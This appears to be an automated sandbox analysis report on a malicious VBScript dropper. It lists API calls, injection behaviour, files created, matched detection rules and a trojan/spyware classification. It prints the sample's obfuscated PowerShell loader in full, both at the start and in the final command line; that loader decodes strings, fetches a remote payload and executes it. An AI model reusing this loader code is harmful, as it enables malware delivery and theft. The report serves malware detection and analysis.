fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (MareschaJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE910 calloc,DuplicateHandle,NtAcceptConnectPort,free,NtAcceptConnectPort,NtAcceptConnectPort,12_3_00007DF45B6FE910
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FF32C NtAcceptConnectPort,free,12_3_00007DF45B6FF32C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FF180 malloc,RtlDosPathNameToNtPathName_U,NtAcceptConnectPort,NtAcceptConnectPort,free,12_3_00007DF45B6FF180
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE25C NtAcceptConnectPort,12_3_00007DF45B6FE25C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE094 NtAcceptConnectPort,12_3_00007DF45B6FE094
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE170 NtAcceptConnectPort,12_3_00007DF45B6FE170
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE150 NtAcceptConnectPort,12_3_00007DF45B6FE150
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE3E8 NtAcceptConnectPort,12_3_00007DF45B6FE3E8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FE3C8 NtAcceptConnectPort,12_3_00007DF45B6FE3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000013E03301CF4 NtAcceptConnectPort,CloseHandle,12_2_0000013E03301CF4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000013E033015C0 NtAcceptConnectPort,12_2_0000013E033015C0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_00007DF488D81958 calloc,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtQueryInformationProcess,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtReadVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,16_3_00007DF488D81958
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_00007DF488D81CE8 calloc,CreateProcessW,NtResumeThread,CloseHandle,free,16_3_00007DF488D81CE8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2CAC NtAcceptConnectPort,16_2_000002614EFE2CAC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2DDC NtAcceptConnectPort,16_2_000002614EFE2DDC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2DAC NtAcceptConnectPort,16_2_000002614EFE2DAC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2D80 NtAcceptConnectPort,16_2_000002614EFE2D80
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE290C NtAcceptConnectPort,16_2_000002614EFE290C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2A20 NtAcceptConnectPort,16_2_000002614EFE2A20
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE3158 NtAcceptConnectPort,16_2_000002614EFE3158
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2EC8 NtAcceptConnectPort,16_2_000002614EFE2EC8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE2E84 NtAcceptConnectPort,16_2_000002614EFE2E84
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488D92E90 NtQuerySystemInformation,malloc,NtQuerySystemInformation,16_2_00007DF488D92E90
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DC25D4 NtQuerySystemInformation,NtQuerySystemInformation,16_2_00007DF488DC25D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C13970 NtQuerySystemInformation,17_2_00000255E9C13970
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAAAB4A3_2_00007FFD9BAAAB4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAAB8D23_2_00007FFD9BAAB8D2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F2E9285_2_04F2E928
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F2F1F85_2_04F2F1F8
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04F2E5E05_2_04F2E5E0
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E033427B212_3_0000013E033427B2
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E03341BBC12_3_0000013E03341BBC
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E03345E9412_3_0000013E03345E94
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E0334559412_3_0000013E03345594
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E0334591412_3_0000013E03345914
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E0334250D12_3_0000013E0334250D
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E03342C5212_3_0000013E03342C52
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_0000013E03344A5012_3_0000013E03344A50
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F08CC12_3_00007DF45B6F08CC
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6D286C12_3_00007DF45B6D286C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B70D42C12_3_00007DF45B70D42C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6E7AE012_3_00007DF45B6E7AE0
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BEB0C12_3_00007DF45B7BEB0C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B718B2812_3_00007DF45B718B28
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B73CB5C12_3_00007DF45B73CB5C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7CAAB412_3_00007DF45B7CAAB4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B730AD412_3_00007DF45B730AD4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6DF9C012_3_00007DF45B6DF9C0
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7719B412_3_00007DF45B7719B4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B72395C12_3_00007DF45B72395C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6EE97012_3_00007DF45B6EE970
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B74582412_3_00007DF45B745824
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BE77412_3_00007DF45B7BE774
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7CDF6C12_3_00007DF45B7CDF6C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F0EF412_3_00007DF45B6F0EF4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B73CE4812_3_00007DF45B73CE48
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B72ECF812_3_00007DF45B72ECF8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B73CD3812_3_00007DF45B73CD38
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B72CC8412_3_00007DF45B72CC84
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BDC9412_3_00007DF45B7BDC94
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B723CE812_3_00007DF45B723CE8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6FCBE812_3_00007DF45B6FCBE8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BBC6812_3_00007DF45B7BBC68
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7ADBC812_3_00007DF45B7ADBC8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B726BE412_3_00007DF45B726BE4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7252F412_3_00007DF45B7252F4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7C32F812_3_00007DF45B7C32F8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B73D2A012_3_00007DF45B73D2A0
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6E21F012_3_00007DF45B6E21F0
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B74D24812_3_00007DF45B74D248
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BA19C12_3_00007DF45B7BA19C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F10BC12_3_00007DF45B6F10BC
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BE0B012_3_00007DF45B7BE0B0
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6D5F9C12_3_00007DF45B6D5F9C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B72FF7812_3_00007DF45B72FF78
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6D105812_3_00007DF45B6D1058
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B75071C12_3_00007DF45B75071C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BD75C12_3_00007DF45B7BD75C
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7BE5F412_3_00007DF45B7BE5F4
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B72564012_3_00007DF45B725640
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7B757812_3_00007DF45B7B7578
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7CA59812_3_00007DF45B7CA598
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7413BC12_3_00007DF45B7413BC
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B77A3C812_3_00007DF45B77A3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B7B23D812_3_00007DF45B7B23D8
                        Source: C:\Windows\System32\svchost.exeCode function: 12_2_0000013E03300C7012_2_0000013E03300C70
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_0000026150A61F4016_3_0000026150A61F40
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_0000026150A6170E16_3_0000026150A6170E
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_0000026150A6271816_3_0000026150A62718
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_0000026150A6027B16_3_0000026150A6027B
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_0000026150A6366016_3_0000026150A63660
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_00007DF488D8392C16_3_00007DF488D8392C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_00007DF488D8220416_3_00007DF488D82204
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_3_00007DF488D84EFC16_3_00007DF488D84EFC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFD262C16_2_000002614EFD262C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFDC2D016_2_000002614EFDC2D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE321816_2_000002614EFE3218
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFEFD3C16_2_000002614EFEFD3C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F01156416_2_000002614F011564
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F005D8416_2_000002614F005D84
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFF74EC16_2_000002614EFF74EC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F009DA816_2_000002614F009DA8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFD14D016_2_000002614EFD14D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F0055BC16_2_000002614F0055BC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F000C4C16_2_000002614F000C4C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFEC5D816_2_000002614EFEC5D8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00F4B816_2_000002614F00F4B8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE758016_2_000002614EFE7580
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFEEABC16_2_000002614EFEEABC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00D3C816_2_000002614F00D3C8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F016C0816_2_000002614F016C08
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F010A4416_2_000002614F010A44
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFEE40416_2_000002614EFEE404
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00F15816_2_000002614F00F158
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00F9A416_2_000002614F00F9A4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFF089816_2_000002614EFF0898
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00420C16_2_000002614F00420C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFF786816_2_000002614EFF7868
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F01422116_2_000002614F014221
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00522416_2_000002614F005224
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F01104816_2_000002614F011048
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE723416_2_000002614EFE7234
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F0050A416_2_000002614F0050A4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F0060EC16_2_000002614F0060EC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F01011416_2_000002614F010114
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00474416_2_000002614F004744
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFED73016_2_000002614EFED730
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00AFF016_2_000002614F00AFF0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFF8E8816_2_000002614EFF8E88
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFF467816_2_000002614EFF4678
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFECE7016_2_000002614EFECE70
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFFE02816_2_000002614EFFE028
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFF7E5816_2_000002614EFF7E58
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614F00669C16_2_000002614F00669C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFE5FCC16_2_000002614EFE5FCC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488D9F04816_2_00007DF488D9F048
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA27AC16_2_00007DF488DA27AC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA152C16_2_00007DF488DA152C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488D9F8E016_2_00007DF488D9F8E0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA9C7416_2_00007DF488DA9C74
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA01A016_2_00007DF488DA01A0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA330816_2_00007DF488DA3308
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA0E7416_2_00007DF488DA0E74
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DA728D16_2_00007DF488DA728D
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DC9C1816_2_00007DF488DC9C18
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DC720016_2_00007DF488DC7200
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DC8FDC16_2_00007DF488DC8FDC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DC848016_2_00007DF488DC8480
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_00007DF488DE22CC16_2_00007DF488DE22CC
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C2A94017_2_00000255E9C2A940
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C298F817_2_00000255E9C298F8
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C1C0BC17_2_00000255E9C1C0BC
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C2287C17_2_00000255E9C2287C
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C2F84C17_2_00000255E9C2F84C
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C293B417_2_00000255E9C293B4
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C3237417_2_00000255E9C32374
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C3333017_2_00000255E9C33330
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C29A7817_2_00000255E9C29A78
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C28A6017_2_00000255E9C28A60
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C3426417_2_00000255E9C34264
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C1BD4017_2_00000255E9C1BD40
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C254A017_2_00000255E9C254A0
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C1745417_2_00000255E9C17454
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C33C6017_2_00000255E9C33C60
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C32BC017_2_00000255E9C32BC0
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C3478017_2_00000255E9C34780
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C3C78817_2_00000255E9C3C788
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C28F9817_2_00000255E9C28F98
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C41F2817_2_00000255E9C41F28
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C18ECC17_2_00000255E9C18ECC
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C326D417_2_00000255E9C326D4
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C1D6DC17_2_00000255E9C1D6DC
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C2AEF017_2_00000255E9C2AEF0
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C1C6AC17_2_00000255E9C1C6AC
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C2E5FC17_2_00000255E9C2E5FC
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C29E1017_2_00000255E9C29E10
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C3C62017_2_00000255E9C3C620
                        Source: C:\Windows\System32\dllhost.exeCode function: 17_2_00000255E9C2A5D817_2_00000255E9C2A5D8
                        Source: payload_1.vbsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4414
                        Source: unknownProcess created: Commandline size = 4414
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4414Jump to behavior
                        Source: amsi32_984.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 984, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@31/11@8/10
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6D286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,12_3_00007DF45B6D286C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Quaiches.ArgJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05qb0tg5.ath.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7020
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=984
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / 